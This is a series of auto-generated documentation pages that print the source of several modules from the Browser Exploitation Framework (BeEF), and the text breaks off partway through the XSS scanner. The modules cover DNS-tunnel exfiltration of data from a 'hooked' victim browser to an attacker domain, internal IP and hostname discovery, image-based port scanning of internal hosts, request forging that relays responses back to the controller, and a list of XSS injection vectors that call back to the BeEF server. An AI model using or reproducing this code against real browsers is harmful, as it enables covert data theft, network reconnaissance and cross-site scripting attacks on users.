<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/dns.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
*
* request object structure:
* + msgId: {Integer} Unique message ID for the request.
* + domain: {String} Remote domain to retrieve the data.
* + wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED
* + callback: {Function} Callback function to receive the number of requests sent.
* @namespace beef.net.dns
*/
beef.net.dns = {
handler: "dns",
/**
*
* @param msgId
* @param data
* @param domain
* @param callback
*/
send: function(msgId, data, domain, callback) {
var encode_data = function(str) {
var result="";
for(i=0;i<str.length;++i) {
result+=str.charCodeAt(i).toString(16).toUpperCase();
}
return result;
};
var encodedData = encodeURI(encode_data(data));
beef.debug(encodedData);
beef.debug("_encodedData_ length: " + encodedData.length);
// limitations to DNS according to RFC 1035:
// o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
// o Domain names are limited to 255 characters in length (including dots)
// o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
// o Subdomains are limited to 63 characters in length (including the trailing dot)
// DNS request structure:
// COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
//max_length: 3. 3 . 3 . 63 . x
// only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
// for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
var max_data_segment_length = 63; // by RFC
beef.debug("max_data_segment_length: " + max_data_segment_length);
var dom = document.createElement('b');
String.prototype.chunk = function(n) {
if (typeof n=='undefined') n=100;
return this.match(RegExp('.{1,'+n+'}','g'));
};
var sendQuery = function(query) {
var img = new Image;
//img.src = "http://"+query;
img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
img.onload = function() { dom.removeChild(this); }
img.onerror = function() { dom.removeChild(this); }
dom.appendChild(img);
//experimental
//setTimeout(function(){dom.removeChild(img)},1000);
};
var segments = encodedData.chunk(max_data_segment_length);
var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
beef.debug(segments.length);
for (var seq=1; seq<=segments.length; seq++) {
sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
}
// callback - returns the number of queries sent
if (!!callback) callback(segments.length);
}
};
beef.regCmp('beef.net.dns');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net_local.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/local.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/local.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides networking functions for the local/internal network of the zombie.
* @namespace beef.net.local
*/
beef.net.local = {
sock: false,
checkJava: false,
hasJava: false,
/**
* Initializes the java socket. We have to use this method because
* some browsers do not have java installed or it is not accessible.
* in which case creating a socket directly generates an error. So this code
* is invalid:
* sock: new java.net.Socket();
*/
initializeSocket: function() {
if(this.checkJava){
if(!beef.browser.hasJava()) {
this.checkJava=True;
this.hasJava=False;
return -1;
}else{
this.checkJava=True;
this.hasJava=True;
return 1;
}
}
else{
if(!this.hasJava) return -1;
else{
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
}
return 1;
}
}
},
/**
* Returns the internal IP address of the zombie.
* @return {String} the internal ip of the zombie.
* @error return -1 if the internal ip cannot be retrieved.
*/
getLocalAddress: function() {
if(!this.hasJava) return false;
this.initializeSocket();
try {
this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
return this.sock.getLocalAddress().getHostAddress();
} catch(e) { return false; }
},
/**
* Returns the internal hostname of the zombie.
* @return {String} the internal hostname of the zombie.
* @error return -1 if the hostname cannot be retrieved.
*/
getLocalHostname: function() {
if(!this.hasJava) return false;
this.initializeSocket();
try {
this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
return this.sock.getLocalAddress().getHostName();
} catch(e) { return false; }
}
};
beef.regCmp('beef.net.local');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net_portscanner.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/portscanner.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/portscanner.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides port scanning functions for the zombie. A mod of pdp's scanner
*
* Version: '0.1',
* author: 'Petko Petkov',
* homepage: 'http://www.gnucitizen.org'
* @namespace beef.net.portscanner
*/
beef.net.portscanner = {
/**
*
* @param callback
* @param target
* @param port
* @param timeout
*/
scanPort: function(callback, target, port, timeout)
{
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
},
/**
*
* @param callback
* @param target
* @param ports_str
* @param timeout
*/
scanTarget: function(callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index < ports.length; index++) {
this.scanPort(callback, target, ports[index], timeout);
};
}
};
beef.regCmp('beef.net.portscanner');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net_requester.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/requester.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/requester.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* request object structure:
* + method: {String} HTTP method to use (GET or POST).
* + host: {String} hostname
* + query_string: {String} The query string is a part of the URL which is passed to the program.
* + uri: {String} The URI syntax consists of a URI scheme name.
* + headers: {Array} contain the operating parameters of the HTTP request.
* @namespace beef.net.requester
*/
beef.net.requester = {
handler: "requester",
/**
*
* @param {array} requests_array
*/
send: function(requests_array) {
for(var i=0; i<requests_array.length; i++){
request = requests_array[i];
if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
function(res, requestid) { beef.net.send('/requester', requestid, {
response_data: res.response_body,
response_status_code: res.status_code,
response_status_text: res.status_text,
response_port_status: res.port_status,
response_headers: res.headers});
}
);
}
}
};
beef.regCmp('beef.net.requester');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net_xssrays.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/xssrays.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/xssrays.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/*
* XSS Rays
* Legal bit:
* Do not remove this notice.
* Copyright (c) 2009 by Gareth Heyes
* Programmed for Microsoft
* gareth --at-- businessinfo -dot- co |dot| uk
* Version 0.5.5
*
* This license governs use of the accompanying software. If you use the software, you
* accept this license. If you do not accept the license, do not use the software.
* 1. Definitions
* The terms "reproduce," "reproduction," "derivative works," and "distribution" have the
* same meaning here as under U.S. copyright law.
* A "contribution" is the original software, or any additions or changes to the software.
* A "contributor" is any person that distributes its contribution under this license.
* "Licensed patents" are a contributor's patent claims that read directly on its contribution.
* 2. Grant of Rights
* (A) Copyright Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution or any derivative works that you create.
* (B) Patent Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution in the software or derivative works of the contribution in the software.
* 3. Conditions and Limitations
* (A) No Trademark License- This license does not grant you rights to use any contributors' name, logo, or trademarks.
* (B) If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your patent license from such contributor to the software ends automatically.
* (C) If you distribute any portion of the software, you must retain all copyright, patent, trademark, and attribution notices that are present in the software.
* (D) If you distribute any portion of the software in source code form, you may do so only under this license by including a complete copy of this license with your distribution. If you distribute any portion of the software in compiled or object code form, you may only do so under a license that complies with this license.
* (E) The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, guarantees or conditions. You may have additional consumer rights under your local laws which this license cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties of merchantability, fitness for a particular purpose and non-infringement.
*/
/**
* XssRays 0.5.5 ported to BeEF by Michele "antisnatchor" Orru'
* The XSS detection mechanisms has been rewritten from scratch: instead of using the location hash trick (that doesn't work anymore),
* if the vulnerability is triggered the JS code vector will contact back BeEF.
* Other aspects of the original code have been simplified and improved.
* @namespace beef.net.xssrays
*/
beef.net.xssrays = {
handler: "xssrays",
completed:0,
totalConnections:0,
// BeEF variables
xssraysScanId : 0,
hookedBrowserSession: "",
beefRayUrl: "",
// the following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
crossDomain: false,
cleanUpTimeout:5000,
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
{input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
],
uniqueID: 0,
rays: [],
stack: [],
/**
* return true is the attack vector can be launched to the current browser type.
* @param {array} vector_array_index
*/
checkBrowser:function(vector_array_index){
var result = false;
var browser_id = this.vectors[vector_array_index].browser;
switch (browser_id){
case "ALL":
result = true;
break;
case "FF":
if(beef.browser.isFF())result=true;
break;
case "IE":
if(beef.browser.isIE())result=true;
break;
case "C":
if(beef.browser.isC())result=true;
break;
case "S":
if(beef.browser.isS())result=true;
break;
case "O":
if(beef.browser.isO())result=true;
break;
default : result = false;
}
beef.debug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
return result;
},
/**
* main function, where all starts :-)
* @param xssraysScanId
* @param hookedBrowserSession
* @param beefUrl
* @param crossDomain
* @param timeout
*/
startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout) {
this.xssraysScanId = xssraysScanId;
this.hookedBrowserSession = hookedBrowserSession;
this.beefRayUrl = beefUrl + '/' + this.handler;
beef.debug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
this.crossDomain = crossDomain;
this.cleanUpTimeout = timeout;
this.scan();
beef.debug("Starting scan");
this.runJobs();
},
complete:function() {
if (beef.net.xssrays.completed == beef.net.xssrays.totalConnections) {
beef.debug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
$j.get(this.beefRayUrl, { hbsess: this.hookedBrowserSession, raysid: this.xssraysScanId, action: "finish"} );
} else {
this.getNextJob();
}
},
getNextJob:function() {
var that = this;
beef.debug("getNextJob - this.stack.length [" + this.stack.length + "]");
if (this.stack.length > 0) {
var func = that.stack.shift();
if (func) {
that.completed++;
func.call(that);
}
}else{ //nothing else to scan
this.complete();
}
},
scan:function() {
this.scanLinks();
this.scanForms();
},
scanPaths:function() {
this.xss({type:'path'});
return this;
},
scanForms: function() {
this.xss({type:'form'});
return this;
},
scanLinks: function() { //TODO: add depth crawling for links that are in the same domain
beef.debug("scanLinks, document.links.length [" + document.links.length + "]");
for (var i = 0; i < document.links.length; i++) {
var url = document.links[i];
if ((url.hostname.toString() === location.hostname.toString() || this.crossDomain) && (location.protocol === 'http:' || location.protocol === 'https:')) {
beef.debug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
"\n url.pathname => " + url.pathname + "\n" +
"url.search => " + url.search + "\n");
this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
search:url.search, type: 'url'});//scan each link & param
} else {
beef.debug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
beef.debug('\nlocation :' + location.hostname.toString());
}
}
if (location.search.length > 0) {
this.xss({pathname:location.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,search:location.search, type: 'url'});//scan originating url
}
return this;
},
xss:function(target) {
switch (target.type) {
case "url":
if (target.search.length > 0) {
target.search = target.search.slice(1);
target.search = target.search.split(/&|&amp;/);
if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
var pathname = "/" + target.pathname;
}else{
var pathname = target.pathname;
}
var params = {};
for (var i = 0; i < target.search.length; i++) {
target.search[i] = target.search[i].split('=');
params[target.search[i][0]] = target.search[i][1];
}
for (var i = 0; i < this.vectors.length; i++) {
// skip the current vector if it's not compatible with the hooked browser
if (!this.checkBrowser(i)){
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
continue;
}
if (!this.vectors[i].url) {
continue;
}
if (this.vectors[i].url) {
if (target.port == null || target.port == "") {
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
} else {
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
}
}
if (this.vectors[i].path) {
if (target.port == null || target.port == "") {
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
} else {
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
}
}
}
}
break;
case "form":
var params = {};
var paramsstring = "";
for (var i = 0; i < document.forms.length; i++) {
var action = document.forms[i].action || document.location;
var method = document.forms[i].method.toUpperCase() === 'POST' ?
'POST' :
'GET';
for (var j = 0; j < document.forms[i].elements.length; j++) {
params[document.forms[i].elements[j].name] = document.forms[i].elements[j].value || 1;
}
for (var k = 0; k < this.vectors.length; k++) {
// skip the current vector if it's not compatible with the hooked browser
if (!this.checkBrowser(k)){
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
continue;
}
if (!this.vectors[k].form) {
continue;
}
if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
beef.debug('location :' + this.host(location));
continue;
}
if (this.vectors[k].form) {
if (method === 'GET') {
beef.debug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
this.run(action, method, this.vectors[k], params, true);//params
}
else {
beef.debug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
this.run(action, method, this.vectors[k], params, false);//params
}
}
if (this.vectors[k].path) {
beef.debug("Starting XSS on FORM action URI PATH of [" + action + "], ");
this.run(action, 'GET', this.vectors[k], null, true);//paths
}
}
}
break;
}
},
host: function(url) {
var host = url;
host = /^https?:[\/]{2}[^\/]+/.test(url.toString())
? url.toString().match(/^https?:[\/]{2}[^\/]+/)
: /(?:^[^a-zA-Z0-9\/]|^[a-zA-Z0-9]+[:]+)/.test(url.toString())
? ''
: location.hostname.toString();
return host;
},
fileName: function(url) {
return url.match(/(?:^[^\/]|^https?:[\/]{2}|^[\/]+)[^?]+/) || '';
},
urlEncode: function(str) {
str = str.toString();
str = str.replace(/"/g, '%22');
str = str.replace(/&/g, '%26');
str = str.replace(/\+/g, '%2b');
return str;
},
/**
* this is the main core function with the detection mechanisms...
* @param url
* @param method
* @param vector
* @param params
* @param urlencode
*/
run: function(url, method, vector, params, urlencode) {
this.stack.push(function() {
//check if the URL end with / . In this case remove the last /, as it will be added later.
// this check is needed only when checking for URI path injections
if(url[url.length - 1] == "/" && params == null){
url = url.substring(0, url.length - 2);
beef.debug("Remove last / from url. New url [" + url + "]");
}
beef.net.xssrays.uniqueID++;
beef.debug('Processing vector [' + vector.name + "], URL [" + url + "]");
var poc = '';
var pocurl = url;
var exploit = '';
var action = url;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID] = {vector:vector,url:url,params:params};
var ray = this.rays[beef.net.xssrays.uniqueID];
var paramsPos = 0;
if (params != null) {
/*
* ++++++++++ check for XSS in URI parameters (GET) ++++++++++
*/
for (var i in params) {
if (params.hasOwnProperty(i)) {
if (!/[?]/.test(url)) {
url += '?';
pocurl += '?';
}
poc = vector.input.replace(/XSS/g, "alert(1)");
pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc) + '&';
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
url += i + '=' + exploit + '&';
}else{
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
}
paramsPos++;
}
}
} else {
/*
* ++++++++++ check for XSS in URI path (GET) ++++++++++
*/
var filename = beef.net.xssrays.fileName(url);
poc = vector.input.replace(/XSS/g, "alert(1)");
